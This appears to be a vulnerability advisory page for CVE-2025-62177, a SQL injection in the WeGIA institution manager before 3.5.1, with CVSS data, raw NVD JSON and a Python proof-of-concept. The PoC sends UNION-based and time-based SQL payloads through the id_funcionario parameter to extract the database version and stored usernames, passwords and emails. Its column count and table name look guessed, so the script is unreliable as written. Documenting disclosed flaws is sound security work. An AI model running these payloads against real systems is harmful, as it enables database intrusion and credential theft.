Security Vulnerability Report
中文
CVE-2025-62177 CVSS 8.8 HIGH

CVE-2025-62177

Published: 2025-10-13 22:15:32
Last Modified: 2025-10-20 16:06:57
Source: [email protected]

Description

WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Prior to 3.5.1, a SQL Injection vulnerability was identified in the /html/funcionario/dependente_listar.php endpoint, specifically in the id_funcionario parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This vulnerability is fixed in 3.5.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA < 3.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62177 - WeGIA SQL Injection PoC # Target: /html/funcionario/dependente_listar.php # Vulnerable parameter: id_funcionario import requests TARGET_URL = "http://target-wegia-server" LOGIN_URL = f"{TARGET_URL}/login.php" VULN_ENDPOINT = f"{TARGET_URL}/html/funcionario/dependente_listar.php" # Step 1: Authenticate with low-privilege credentials session = requests.Session() login_data = { "username": "attacker_user", "password": "attacker_password" } session.post(LOGIN_URL, data=login_data) # Step 2: Exploit SQL Injection via id_funcionario parameter # Example 1: UNION-based SQLi to extract database version payload_version = "1' UNION SELECT 1,version(),database(),user(),5,6,7,8-- -" params = {"id_funcionario": payload_version} response = session.get(VULN_ENDPOINT, params=params) print("[*] Database version extraction:") print(response.text) # Example 2: Extract admin credentials payload_creds = "1' UNION SELECT 1,username,password,email,5,6,7,8 FROM funcionarios-- -" params = {"id_funcionario": payload_creds} response = session.get(VULN_ENDPOINT, params=params) print("\n[*] Admin credentials extraction:") print(response.text) # Example 3: Time-based blind SQLi to confirm vulnerability import time payload_time = "1' AND SLEEP(5)-- -" params = {"id_funcionario": payload_time} start = time.time() response = session.get(VULN_ENDPOINT, params=params) elapsed = time.time() - start print(f"\n[*] Time-based blind test elapsed: {elapsed:.2f}s (vulnerable if > 5s)")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62177", "sourceIdentifier": "[email protected]", "published": "2025-10-13T22:15:32.397", "lastModified": "2025-10-20T16:06:57.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Prior to 3.5.1, a SQL Injection vulnerability was identified in the /html/funcionario/dependente_listar.php endpoint, specifically in the id_funcionario parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This vulnerability is fixed in 3.5.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.1", "matchCriteriaId": "0380F435-A37D-48F3-87E5-A2648574EDC0"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/commit/017fdd71380ab898570752aebc3fe1ef318a5d0d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4wrg-g9cj-hjcx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.